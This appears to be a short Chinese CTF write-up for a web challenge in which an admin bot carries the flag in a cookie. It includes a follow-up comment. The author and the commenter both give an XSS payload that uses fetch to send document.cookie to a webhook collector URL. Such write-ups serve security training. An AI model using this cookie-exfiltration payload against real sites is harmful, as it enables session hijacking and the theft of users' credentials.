SS Xperience

18092952956 2024-09-09 16:09:40 1031 0 返回题目详情


constants.py

FLAG=os.getenv('FLAG',r'grey{fake_flag}')

COOKIE={"flag":FLAG}


flag在cookie里边,想到cookie外带。


adminbot中from constants import COOKIE  

driver.get(f'{baseUrl}/')

cookie={"name":"flag","value":COOKIE["flag"]}

driver.add_cookie(cookie)

driver.get(link)

print(f"Visited{link}")


server.py访问了adminbot的visit

很明显了,利用xss外带cookie

利用webhook进行接受,可能会有点慢,等个几分钟。

<scriptsrc="fetch(`https://webhook...../?cookie=${document.cookie}`)"></script>
分类:WEB
评论
caocao 16天前

打开 webhook.site → 复制你的专属 URL 构造 payload: &lt;scriptsrc=&quot;fetch(`https://webhook...../?cookie=${document.cookie}`)&quot;&gt;&lt;/script&gt; 返回 webhook.site 查看收到的请求,在 URL 参数中找到 flag

回复 0
image
作者:18092952956

1

提交

0

收入

相关WriteUP

  • cookiehead

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 10月前
  • sqli-0x1 Writeup

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 2年前
  • [HackINI-2022] lfi WriteUp

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 2年前
  • just-work-type

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 2年前
  • SQL注入.2

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
问题反馈